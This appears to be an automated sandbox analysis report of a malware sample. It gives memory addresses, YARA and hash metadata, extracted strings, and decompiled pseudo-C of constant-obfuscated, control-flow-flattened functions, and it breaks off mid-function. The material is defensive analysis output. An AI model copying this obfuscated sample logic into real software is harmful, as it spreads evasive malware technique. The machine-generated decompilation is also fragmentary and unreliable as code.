                          0x01115fbf
                          0x01115fca
                          0x01115fd5
                          0x01115fdd
                          0x01115fe5
                          0x01115fed
                          0x01115ff8
                          0x01116003
                          0x0111600e
                          0x0111600e
                          0x01116010
                          0x01116011
                          0x01116011
                          0x01116011
                          0x01116016
                          0x01116016
                          0x01116018
                          0x011161c7
                          0x011161d0
                          0x01116221
                          0x01116244
                          0x01116247
                          0x0111624c
                          0x0111624f
                          0x01116256
                          0x00000000
                          0x0111601e
                          0x01116024
                          0x01116122
                          0x0111612e
                          0x01116139
                          0x01116147
                          0x0111619b
                          0x011161b5
                          0x011161ba
                          0x011161bd
                          0x00000000
                          0x0111602a
                          0x0111602c
                          0x01116102
                          0x01116109
                          0x0111610c
                          0x0111610e
                          0x01116116
                          0x0111600e
                          0x0111600e
                          0x01116010
                          0x00000000
                          0x01116010
                          0x0111602e
                          0x01116034
                          0x0111608a
                          0x01116095
                          0x01116095
                          0x01116098
                          0x00000000
                          0x00000000
                          0x01116092
                          0x01116092
                          0x01116092
                          0x0111609a
                          0x0111609d
                          0x00000000
                          0x01116036
                          0x0111603c
                          0x01116285
                          0x01116042
                          0x01116048
                          0x00000000
                          0x0111604e
                          0x01116075
                          0x0111607a
                          0x0111607d
                          0x0111600e
                          0x0111600e
                          0x01116010
                          0x01116011
                          0x01116011
                          0x00000000
                          0x01116011
                          0x0111600e
                          0x01116048
                          0x0111603c
                          0x01116034
                          0x0111602c
                          0x01116024
                          0x0111628d
                          0x0111629e
                          0x01116257
                          0x01116257
                          0x01116257
                          0x00000000
                          0x01116263
                          0x01116011

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #1$)$+^3=$7l$:8@$F{g$N1$]qIP$`)/$jMfp$lfu*$y<$}yM
                          • API String ID: 0-2915221957
                          • Opcode ID: 9d08df1cb03fcaa2d5e2fbda2278522f179718b4951753cfb1663e799ef90351
                          • Instruction ID: 3b3d670d55c772ed9264fa834d82f33efecf1b5f74630a8cc6b99e088cfbbfba
                          • Opcode Fuzzy Hash: 9d08df1cb03fcaa2d5e2fbda2278522f179718b4951753cfb1663e799ef90351
                          • Instruction Fuzzy Hash: 6522F1715083809FD3B8CF25C88AA8BFBE2BBD4748F10891DE1D986260D7B58949CF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDA890, Relevance: 15.7, Strings: 11, Instructions: 1959COMMON
                          Download Yara Rule
                          Strings
                          • .assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6ECDBCC4, 6ECDC087
                          • called `Option::unwrap()` on a `None` value, xrefs: 6ECDC12E
                          • SizeLimitExhausted, xrefs: 6ECDC299
                          • $, xrefs: 6ECDBBF3
                          • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6ECDB589
                          • called `Result::unwrap()` on an `Err` value, xrefs: 6ECDC14D
                          • @*&<>()C,, xrefs: 6ECDC030, 6ECDC0F2
                          • __ZN, xrefs: 6ECDAD97
                          • h, xrefs: 6ECDB8AB
                          • $, xrefs: 6ECDBBE3
                          • .llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq, xrefs: 6ECDA8AD
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: $$$$.assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed$.llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
                          • API String ID: 0-351887750
                          • Opcode ID: 294823fe1e3992b1f88eb81e6031008d265accef3cfb9a1937d86b72e2cf6794
                          • Instruction ID: f2ba04c53fbd1d7ad054b77816061ede9c152de757caafcab3f416d561b091ce
                          • Opcode Fuzzy Hash: 294823fe1e3992b1f88eb81e6031008d265accef3cfb9a1937d86b72e2cf6794
                          • Instruction Fuzzy Hash: CDE20771A0C3529FD314CF99C49065AB7E2BFC5350F148A2DE6A58B399F732D849CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111C205, Relevance: 14.2, Strings: 11, Instructions: 450COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E0111C205(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				unsigned int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				void* _t487;
				void* _t491;
				short* _t496;
				void* _t498;
				void* _t504;
				void* _t507;
				void* _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t529;
				void* _t543;
				signed int _t589;
				void* _t591;
				signed int* _t596;

				_t596 =  &_v1788;
				_v1584 = _v1584 & 0x00000000;
				_v1632 = 0x53b728;
				_v1632 = _v1632 + 0xffffd00f;
				_v1632 = _v1632 ^ 0x02538737;
				_v1692 = 0x5dde51;
				_v1692 = _v1692 + 0xffffc72f;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0x5da9926e;
				_v1672 = 0xad9f1;
				_v1672 = _v1672 >> 8;
				_v1672 = _v1672 + 0xfffff529;
				_v1672 = _v1672 ^ 0x00008b94;
				_v1596 = 0xf223a8;
				_t516 = __ecx;
				_t591 = 0x64278db;
				_t518 = 0x1f;
				_v1596 = _v1596 / _t518;
				_v1596 = _v1596 ^ 0x000ed2b2;
				_v1768 = 0x3ef02a;
				_v1768 = _v1768 << 7;
				_v1768 = _v1768 + 0xa089;
				_v1768 = _v1768 + 0x3571;
				_v1768 = _v1768 ^ 0x1f77b471;
				_v1708 = 0xc715be;
				_t519 = 0x7c;
				_v1708 = _v1708 / _t519;
				_v1708 = _v1708 + 0xa9b;
				_v1708 = _v1708 ^ 0x000cc03e;
				_v1640 = 0xf5c20e;
				_v1640 = _v1640 + 0x1e32;
				_v1640 = _v1640 ^ 0x00fd9706;
				_v1680 = 0xf22aa7;
				_v1680 = _v1680 | 0x1e0d26ed;
				_t520 = 0x43;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 ^ 0xddab6df6;
				_v1756 = 0x5f1bc1;
				_v1756 = _v1756 << 0xa;
				_v1756 = _v1756 | 0x1ee2bf71;
				_v1756 = _v1756 << 0x10;
				_v1756 = _v1756 ^ 0xbf7898bf;
				_v1644 = 0x395bf;
				_v1644 = _v1644 << 7;
				_v1644 = _v1644 ^ 0x01cfa7c3;
				_v1772 = 0x3904e8;
				_v1772 = _v1772 + 0x8f69;
				_v1772 = _v1772 + 0xdb14;
				_v1772 = _v1772 | 0x17a7223e;
				_v1772 = _v1772 ^ 0x17b3767c;
				_v1788 = 0xab8cbd;
				_v1788 = _v1788 >> 0xc;
				_v1788 = _v1788 / _t520;
				_v1788 = _v1788 + 0xffffbfe3;
				_v1788 = _v1788 ^ 0xfffe4ed4;
				_v1604 = 0xc318fb;
				_v1604 = _v1604 * 0x15;
				_v1604 = _v1604 ^ 0x100d5bde;
				_v1712 = 0xdecc74;
				_v1712 = _v1712 << 0xf;
				_v1712 = _v1712 * 0x6a;
				_v1712 = _v1712 ^ 0x540cb602;
				_v1784 = 0x375fb9;
				_v1784 = _v1784 << 4;
				_v1784 = _v1784 | 0xabc0ebaf;
				_v1784 = _v1784 << 2;
				_v1784 = _v1784 ^ 0xafd33898;
				_v1688 = 0x35bac8;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 >> 6;
				_v1688 = _v1688 ^ 0x000070de;
				_v1588 = 0xb58e78;
				_v1588 = _v1588 ^ 0xb0c46a78;
				_v1588 = _v1588 ^ 0xb07b43dd;
				_v1636 = 0x8b407b;
				_t521 = 0x2f;
				_v1636 = _v1636 / _t521;
				_v1636 = _v1636 ^ 0x000c4486;
				_v1704 = 0x9211ca;
				_v1704 = _v1704 | 0x22c82110;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x5b4dbfff;
				_v1732 = 0x261d00;
				_v1732 = _v1732 | 0xce3841e3;
				_v1732 = _v1732 + 0xffff8b72;
				_v1732 = _v1732 ^ 0xce34913b;
				_v1620 = 0xaa7fd6;
				_v1620 = _v1620 >> 9;
				_v1620 = _v1620 ^ 0x00008b2b;
				_v1592 = 0x25885e;
				_v1592 = _v1592 + 0xffff7d04;
				_v1592 = _v1592 ^ 0x0020c98d;
				_v1736 = 0xe0d47f;
				_v1736 = _v1736 + 0x6f49;
				_v1736 = _v1736 >> 4;
				_v1736 = _v1736 ^ 0x0009d074;
				_v1628 = 0x512d73;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x14481f98;
				_v1660 = 0x3ed413;
				_v1660 = _v1660 + 0xffff4d81;
				_v1660 = _v1660 ^ 0x00309f09;
				_v1776 = 0x7eaa8f;
				_v1776 = _v1776 << 0xb;
				_v1776 = _v1776 >> 2;
				_t522 = 0x6f;
				_v1776 = _v1776 / _t522;
				_v1776 = _v1776 ^ 0x0084e4b8;
				_v1600 = 0x7d4705;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x000c849c;
				_v1724 = 0x268426;
				_v1724 = _v1724 ^ 0xdd0187c5;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 ^ 0xc0f20a62;
				_v1648 = 0x88354a;
				_v1648 = _v1648 + 0x46c9;
				_v1648 = _v1648 ^ 0x00820072;
				_v1656 = 0x199859;
				_v1656 = _v1656 + 0xffffc38f;
				_v1656 = _v1656 ^ 0x001738cc;
				_v1716 = 0x9ddb87;
				_v1716 = _v1716 | 0xc4b29989;
				_v1716 = _v1716 >> 7;
				_v1716 = _v1716 ^ 0x018a1e72;
				_v1612 = 0xef86f2;
				_v1612 = _v1612 >> 4;
				_v1612 = _v1612 ^ 0x00099134;
				_v1696 = 0xbb1d9c;
				_t523 = 0x57;
				_v1696 = _v1696 / _t523;
				_t524 = 0x5d;
				_v1696 = _v1696 / _t524;
				_v1696 = _v1696 ^ 0x0009288e;
				_v1780 = 0xa5e37;
				_t245 =  &_v1780; // 0xa5e37
				_t525 = 0x2a;
				_v1780 =  *_t245 * 0x15;
				_v1780 = _v1780 ^ 0x77e30140;
				_v1780 = _v1780 * 0x2f;
				_v1780 = _v1780 ^ 0xe3c80932;
				_v1728 = 0xd57028;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 / _t525;
				_v1728 = _v1728 ^ 0x000f0094;
				_v1764 = 0xcd1fae;
				_v1764 = _v1764 ^ 0xc4f885fe;
				_v1764 = _v1764 ^ 0x05d45947;
				_t526 = 0x54;
				_v1764 = _v1764 * 0x7d;
				_v1764 = _v1764 ^ 0xab389179;
				_v1720 = 0xb4f0e6;
				_v1720 = _v1720 ^ 0x1f4d57f4;
				_v1720 = _v1720 / _t526;
				_v1720 = _v1720 ^ 0x00604eb2;
				_v1748 = 0x63ad26;
				_v1748 = _v1748 + 0xad4f;
				_v1748 = _v1748 ^ 0x0965e416;
				_v1748 = _v1748 + 0xffff38ee;
				_v1748 = _v1748 ^ 0x0906cb18;
				_v1664 = 0x920166;
				_v1664 = _v1664 << 0x10;
				_v1664 = _v1664 ^ 0x016542eb;
				_v1652 = 0x809268;
				_v1652 = _v1652 << 8;
				_v1652 = _v1652 ^ 0x8096ea3b;
				_v1616 = 0x543760;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0xa1b1aa26;
				_v1676 = 0xb03be2;
				_v1676 = _v1676 >> 0xb;
				_v1676 = _v1676 + 0xd6ce;
				_v1676 = _v1676 ^ 0x000f22cb;
				_v1760 = 0xdc251e;
				_v1760 = _v1760 | 0x3ab91ea5;
				_v1760 = _v1760 + 0x2428;
				_t527 = 0x18;
				_v1760 = _v1760 * 0x45;
				_v1760 = _v1760 ^ 0xe64e7237;
				_v1684 = 0x929343;
				_v1684 = _v1684 ^ 0xdb83494f;
				_v1684 = _v1684 / _t527;
				_v1684 = _v1684 ^ 0x092a7c84;
				_v1740 = 0x63a33d;
				_v1740 = _v1740 + 0xfffffdc3;
				_v1740 = _v1740 ^ 0xeecf69ea;
				_v1740 = _v1740 ^ 0xeea535df;
				_v1608 = 0xb62693;
				_v1608 = _v1608 >> 4;
				_v1608 = _v1608 ^ 0x000522a0;
				_v1668 = 0x2d10b5;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 + 0x1174;
				_v1668 = _v1668 ^ 0x000d75a2;
				_v1744 = 0x9bc249;
				_t528 = 0x1b;
				_v1744 = _v1744 / _t528;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 + 0x97a6;
				_v1744 = _v1744 ^ 0x0003d8b3;
				_v1752 = 0x81a885;
				_v1752 = _v1752 | 0x7c450d1e;
				_v1752 = _v1752 + 0x4652;
				_v1752 = _v1752 << 0xe;
				_v1752 = _v1752 ^ 0x7cf762d8;
				_v1624 = 0xd67170;
				_v1624 = _v1624 >> 9;
				_v1624 = _v1624 ^ 0x00041f96;
				_v1700 = 0x51d643;
				_v1700 = _v1700 >> 9;
				_v1700 = _v1700 >> 7;
				_v1700 = _v1700 ^ 0x00081f7a;
				_t589 = _v1584;
				while(1) {
					L1:
					_t487 = 0x689aa28;
					while(1) {
						L2:
						_t529 = 0xc3fdd40;
						do {
							L3:
							while(_t591 != 0x27e97d) {
								if(_t591 == 0x88c97f) {
									_push(_t529);
									_t491 = E0111EA55(0, _v1616, __eflags, _v1676,  &_v1564, _v1760, 0, _v1684, _v1740,  &_v1580);
									__eflags = _t491;
									if(_t491 == 0) {
										L26:
										return _t491;
									}
									E01114A33(_v1608, _v1668, _v1580);
									return E01114A33(_v1744, _v1752, _v1576);
								}
								if(_t591 == 0x64278db) {
									_t591 = 0xf344949;
									continue;
								}
								if(_t591 == 0xb379dcd) {
									__eflags = _t589 - _t487;
									if(__eflags != 0) {
										_t591 = 0xb6fc5c6;
										continue;
									}
									_push(_v1640);
									_push(_t529);
									_t491 = E0110358B(_v1768, _v1632,  &_v1584, _v1708, _t529);
									_t596 =  &(_t596[5]);
									__eflags = _t491;
									if(__eflags == 0) {
										goto L26;
									}
									_t591 = 0xb6fc5c6;
									while(1) {
										L1:
										_t487 = 0x689aa28;
										L2:
										_t529 = 0xc3fdd40;
										goto L3;
									}
								}
								if(_t591 == 0xb6fc5c6) {
									E0111855C( &_v1044, _v1680, __eflags, _v1756, _v1644, _t529, _v1772);
									_t496 = E01102B69(_v1788, _v1604,  &_v1044, _v1712);
									_t416 =  &_v1784; // 0x2428
									 *_t496 = 0;
									E01103432( &_v524,  *_t416, __eflags, _v1688);
									_push(_v1704);
									_push(_v1636);
									_t498 = E0111CD35(0x11013e4, _v1588, __eflags);
									_pop(_t543);
									E01112EA5( &_v524, __eflags,  &_v1044, _t543, _v1620, _v1592, _t498, _v1736, _v1628,  &_v1564);
									E0111629F(_v1660, _t498, _v1776, _v1600, _v1724);
									_t504 = E0111E5A7(_t516, _v1648, _v1656,  &_v1564, _v1716);
									_t596 =  &(_t596[0x15]);
									__eflags = _t504;
									if(__eflags == 0) {
										L13:
										_t591 = 0x27e97d;
										goto L1;
									}
									_t487 = 0x689aa28;
									__eflags = _t589 - 0x689aa28;
									_t529 = 0xc3fdd40;
									_t591 =  ==  ? 0xc3fdd40 : 0x88c97f;
									continue;
								}
								if(_t591 == _t529) {
									_push(_v1764);
									_t397 =  &_v1780; // 0xe64e7237
									_t507 = E01103A6C(_v1612,  &_v1564, _v1696,  *_t397, _v1584,  &_v1580, _t529, _v1728);
									_t596 =  &(_t596[8]);
									__eflags = _t507;
									if(__eflags != 0) {
										E01114A33(_v1720, _v1748, _v1580);
										E01114A33(_v1664, _v1652, _v1576);
									}
									goto L13;
								}
								if(_t591 != 0xf344949) {
									goto L22;
								}
								E01102ADB();
								E0111DDA5();
								_t487 = 0x689aa28;
								_t591 = 0xb379dcd;
								_t589 =  !=  ? 0x689aa28 : 0x8bd357c;
								goto L2;
							}
							E01114A33(_v1624, _v1700, _v1584);
							_t591 = 0x4f06587;
							_t487 = 0x689aa28;
							_t529 = 0xc3fdd40;
							L22:
							__eflags = _t591 - 0x4f06587;
						} while (__eflags != 0);
						return _t487;
					}
				}
			}



















































































                          0x0111c205
                          0x0111c20b
                          0x0111c215
                          0x0111c220
                          0x0111c22b
                          0x0111c236
                          0x0111c23e
                          0x0111c246
                          0x0111c24b
                          0x0111c253
                          0x0111c25b
                          0x0111c260
                          0x0111c268
                          0x0111c270
                          0x0111c288
                          0x0111c28a
                          0x0111c28f
                          0x0111c294
                          0x0111c29d
                          0x0111c2a8
                          0x0111c2b0
                          0x0111c2b5
                          0x0111c2bd
                          0x0111c2c5
                          0x0111c2cd
                          0x0111c2d9
                          0x0111c2de
                          0x0111c2e4
                          0x0111c2ec
                          0x0111c2f4
                          0x0111c2ff
                          0x0111c30a
                          0x0111c315
                          0x0111c320
                          0x0111c333
                          0x0111c334
                          0x0111c338
                          0x0111c340
                          0x0111c348
                          0x0111c34d
                          0x0111c355
                          0x0111c35a
                          0x0111c362
                          0x0111c36d
                          0x0111c375
                          0x0111c380
                          0x0111c388
                          0x0111c390
                          0x0111c398
                          0x0111c3a0
                          0x0111c3a8
                          0x0111c3b0
                          0x0111c3bb
                          0x0111c3bf
                          0x0111c3c7
                          0x0111c3cf
                          0x0111c3e2
                          0x0111c3e9
                          0x0111c3f4
                          0x0111c3fc
                          0x0111c406
                          0x0111c40a
                          0x0111c412
                          0x0111c41a
                          0x0111c421
                          0x0111c429
                          0x0111c42e
                          0x0111c436
                          0x0111c43e
                          0x0111c442
                          0x0111c447
                          0x0111c44f
                          0x0111c45a
                          0x0111c465
                          0x0111c470
                          0x0111c484
                          0x0111c489
                          0x0111c492
                          0x0111c49d
                          0x0111c4a5
                          0x0111c4ad
                          0x0111c4b2
                          0x0111c4ba
                          0x0111c4c2
                          0x0111c4ca
                          0x0111c4d2
                          0x0111c4da
                          0x0111c4e5
                          0x0111c4ed
                          0x0111c4f8
                          0x0111c503
                          0x0111c50e
                          0x0111c519
                          0x0111c521
                          0x0111c529
                          0x0111c52e
                          0x0111c536
                          0x0111c541
                          0x0111c549
                          0x0111c554
                          0x0111c55f
                          0x0111c56a
                          0x0111c575
                          0x0111c57d
                          0x0111c582
                          0x0111c58b
                          0x0111c590
                          0x0111c596
                          0x0111c59e
                          0x0111c5a9
                          0x0111c5b1
                          0x0111c5bc
                          0x0111c5c4
                          0x0111c5cc
                          0x0111c5d1
                          0x0111c5d9
                          0x0111c5e4
                          0x0111c5ef
                          0x0111c5fa
                          0x0111c605
                          0x0111c610
                          0x0111c61b
                          0x0111c623
                          0x0111c62b
                          0x0111c630
                          0x0111c638
                          0x0111c643
                          0x0111c64b
                          0x0111c656
                          0x0111c662
                          0x0111c665
                          0x0111c671
                          0x0111c676
                          0x0111c67c
                          0x0111c684
                          0x0111c68c
                          0x0111c691
                          0x0111c694
                          0x0111c698
                          0x0111c6a5
                          0x0111c6a9
                          0x0111c6b1
                          0x0111c6b9
                          0x0111c6c6
                          0x0111c6ca
                          0x0111c6d2
                          0x0111c6da
                          0x0111c6e2
                          0x0111c6ef
                          0x0111c6f2
                          0x0111c6f6
                          0x0111c6fe
                          0x0111c706
                          0x0111c716
                          0x0111c71a
                          0x0111c722
                          0x0111c72a
                          0x0111c732
                          0x0111c73a
                          0x0111c742
                          0x0111c74a
                          0x0111c755
                          0x0111c75d
                          0x0111c768
                          0x0111c773
                          0x0111c77b
                          0x0111c786
                          0x0111c791
                          0x0111c799
                          0x0111c7a4
                          0x0111c7af
                          0x0111c7b7
                          0x0111c7c2
                          0x0111c7cd
                          0x0111c7d5
                          0x0111c7dd
                          0x0111c7ea
                          0x0111c7eb
                          0x0111c7ef
                          0x0111c7f7
                          0x0111c7ff
                          0x0111c80d
                          0x0111c811
                          0x0111c819
                          0x0111c821
                          0x0111c829
                          0x0111c831
                          0x0111c839
                          0x0111c844
                          0x0111c84c
                          0x0111c857
                          0x0111c862
                          0x0111c86a
                          0x0111c875
                          0x0111c880
                          0x0111c895
                          0x0111c898
                          0x0111c89c
                          0x0111c8a1
                          0x0111c8a9
                          0x0111c8b1
                          0x0111c8b9
                          0x0111c8c1
                          0x0111c8c9
                          0x0111c8ce
                          0x0111c8d6
                          0x0111c8e1
                          0x0111c8e9
                          0x0111c8f4
                          0x0111c8fc
                          0x0111c901
                          0x0111c906
                          0x0111c90e
                          0x0111c915
                          0x0111c915
                          0x0111c915
                          0x0111c91a
                          0x0111c91a
                          0x0111c91a
                          0x0111c91f
                          0x00000000
                          0x0111c91f
                          0x0111c92d
                          0x0111cbb8
                          0x0111cbea
                          0x0111cbf2
                          0x0111cbf4
                          0x0111cc30
                          0x0111cc30
                          0x0111cc30
                          0x0111cc0b
                          0x00000000
                          0x0111cc25
                          0x0111c939
                          0x0111cb79
                          0x00000000
                          0x0111cb79
                          0x0111c945
                          0x0111cb31
                          0x0111cb33
                          0x0111cb6f
                          0x00000000
                          0x0111cb6f
                          0x0111cb35
                          0x0111cb43
                          0x0111cb55
                          0x0111cb5a
                          0x0111cb5d
                          0x0111cb5f
                          0x00000000
                          0x00000000
                          0x0111cb65
                          0x0111c915
                          0x0111c915
                          0x0111c915
                          0x0111c91a
                          0x0111c91a
                          0x00000000
                          0x0111c91a
                          0x0111c915
                          0x0111c951
                          0x0111ca31
                          0x0111ca4d
                          0x0111ca59
                          0x0111ca5f
                          0x0111ca69
                          0x0111ca76
                          0x0111ca7a
                          0x0111ca88
                          0x0111ca8e
                          0x0111cac7
                          0x0111cae4
                          0x0111cb08
                          0x0111cb0d
                          0x0111cb10
                          0x0111cb12
                          0x0111ca0c
                          0x0111ca0c
                          0x00000000
                          0x0111ca0c
                          0x0111cb18
                          0x0111cb22
                          0x0111cb24
                          0x0111cb29
                          0x00000000
                          0x0111cb29
                          0x0111c959
                          0x0111c99e
                          0x0111c9bd
                          0x0111c9d0
                          0x0111c9d5
                          0x0111c9d8
                          0x0111c9da
                          0x0111c9eb
                          0x0111ca06
                          0x0111ca0b
                          0x00000000
                          0x0111c9da
                          0x0111c961
                          0x00000000
                          0x00000000
                          0x0111c979
                          0x0111c980
                          0x0111c98c
                          0x0111c991
                          0x0111c996
                          0x00000000
                          0x0111c996
                          0x0111cb95
                          0x0111cb9b
                          0x0111cba0
                          0x0111cba5
                          0x0111cbaa
                          0x0111cbaa
                          0x0111cbaa
                          0x00000000
                          0x0111c91f
                          0x0111c91a

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ($7rN$($7rN$7^$7rN$7rN$Io$`7T$q5$r$s-Q$}'
                          • API String ID: 0-2675266107
                          • Opcode ID: 86fd4c43e088c930f1808190aaceb63fb64ba3cd2a72a2ba2fb54c0afe55c59e
                          • Instruction ID: 8fb5d3c42c4e5cc76e54db53e69d6394d9b52001eb93627e2d9c162fba1e59ee
                          • Opcode Fuzzy Hash: 86fd4c43e088c930f1808190aaceb63fb64ba3cd2a72a2ba2fb54c0afe55c59e
                          • Instruction Fuzzy Hash: 183220725083819FE368CF64C449A9FFBE1BBC4348F108A1DE6DA96264D7B18909CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011059BF, Relevance: 12.9, Strings: 10, Instructions: 394COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 99%
                          			E011059BF() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				intOrPtr* _t424;
				void* _t425;
				intOrPtr* _t438;
				void* _t440;
				void* _t470;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				intOrPtr _t487;
				intOrPtr* _t489;
				intOrPtr* _t490;
				signed int* _t494;
				void* _t496;

				_t494 =  &_v1748;
				_v1620 = 0xe208d1;
				_v1620 = _v1620 >> 0x10;
				_t440 = 0x6dd668d;
				_v1620 = _v1620 ^ 0x000000cb;
				_v1632 = 0xf714e8;
				_v1632 = _v1632 >> 0xe;
				_v1632 = _v1632 * 0x70;
				_t490 = 0;
				_v1632 = _v1632 ^ 0x000eb07f;
				_v1572 = 0x2de42c;
				_v1572 = _v1572 | 0x0db3fdf3;
				_v1572 = _v1572 ^ 0x0dbffdfd;
				_v1748 = 0xbc7661;
				_v1748 = _v1748 >> 6;
				_v1748 = _v1748 ^ 0xe50abbec;
				_v1748 = _v1748 >> 6;
				_v1748 = _v1748 ^ 0x0394212a;
				_v1604 = 0xaddaf5;
				_v1604 = _v1604 | 0x415c680c;
				_v1604 = _v1604 ^ 0x41fdfafd;
				_v1588 = 0xdfa901;
				_v1588 = _v1588 + 0xffff3ba4;
				_v1588 = _v1588 ^ 0x00dee4b5;
				_v1644 = 0xd2ab4c;
				_v1644 = _v1644 + 0x7555;
				_v1644 = _v1644 | 0xc36f5ef2;
				_v1644 = _v1644 ^ 0xc3ffc95b;
				_v1684 = 0x1437f7;
				_v1684 = _v1684 + 0x6d4b;
				_v1684 = _v1684 + 0x4f22;
				_v1684 = _v1684 ^ 0x001a9d05;
				_v1740 = 0xba04d3;
				_v1740 = _v1740 >> 0xd;
				_t480 = 0x37;
				_v1740 = _v1740 / _t480;
				_v1740 = _v1740 >> 4;
				_v1740 = _v1740 ^ 0x000d936b;
				_v1628 = 0xc18096;
				_v1628 = _v1628 << 4;
				_v1628 = _v1628 ^ 0x0c105ee9;
				_v1716 = 0x1658bb;
				_v1716 = _v1716 ^ 0xaff49a84;
				_v1716 = _v1716 ^ 0x6e4c268d;
				_v1716 = _v1716 ^ 0xc3497a67;
				_v1716 = _v1716 ^ 0x02e2fab6;
				_v1652 = 0x22ed00;
				_t481 = 0x22;
				_v1576 = 0;
				_v1652 = _v1652 * 0x60;
				_v1652 = _v1652 * 0x3a;
				_v1652 = _v1652 ^ 0xf7a66c18;
				_v1676 = 0xbfcbd5;
				_v1676 = _v1676 ^ 0x30bc9787;
				_v1676 = _v1676 | 0x6db8c808;
				_v1676 = _v1676 ^ 0x7db478e8;
				_v1724 = 0x27ac8c;
				_v1724 = _v1724 << 8;
				_v1724 = _v1724 * 0x31;
				_v1724 = _v1724 << 9;
				_v1724 = _v1724 ^ 0x0d9e6424;
				_v1636 = 0xf4f9d3;
				_v1636 = _v1636 / _t481;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x000b680c;
				_v1612 = 0x15495f;
				_t482 = 0x4a;
				_v1612 = _v1612 * 0x17;
				_v1612 = _v1612 ^ 0x01ebd1be;
